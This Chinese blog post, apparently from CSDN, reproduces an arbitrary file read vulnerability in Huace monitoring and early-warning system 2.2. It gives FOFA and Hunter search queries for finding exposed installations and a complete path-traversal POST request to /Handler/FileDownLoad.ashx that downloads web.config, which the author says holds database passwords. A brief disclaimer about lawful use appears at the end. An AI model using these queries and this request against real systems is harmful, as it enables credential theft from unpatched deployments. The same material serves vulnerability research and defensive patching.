华测监测预警系统 2.2---任意文件读取漏洞

本文介绍了如何使用FOFA和Hunter工具进行资产搜集,包括ICP备案公司的搜索。随后详细讲述了如何手动复现漏洞,通过POST请求访问包含敏感信息的文件。作者强调了合法使用这些技术的重要性,旨在网络安全技术讨论而非非法用途。
摘要由CSDN通过智能技术生成
1. 资产搜集

直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了

FOFA语法 app=”华测监测预警系统2.2”

Hunter语法 web.body=”华测监测预警系统2.2”

图片

2. 漏洞复现

这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。

 
  1. POST /Handler/FileDownLoad.ashx HTTP/1.1

  2. Host: ip:port

  3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

  4. Accept-Encoding: gzip, deflate

  5. Accept: */*

  6. Connection: close

  7. Content-Type: application/x-www-form-urlencoded

  8. Content-Length: 36

  9. filename=1&filepath=../../web.config

这里的filename随便传参,只是一个文件名字。
filepath是文件路径,这里访问后会直接下载文件到本地。

图片

文件里包含了数据库的账号密码

3. 实战总结

最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!!!

图片

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值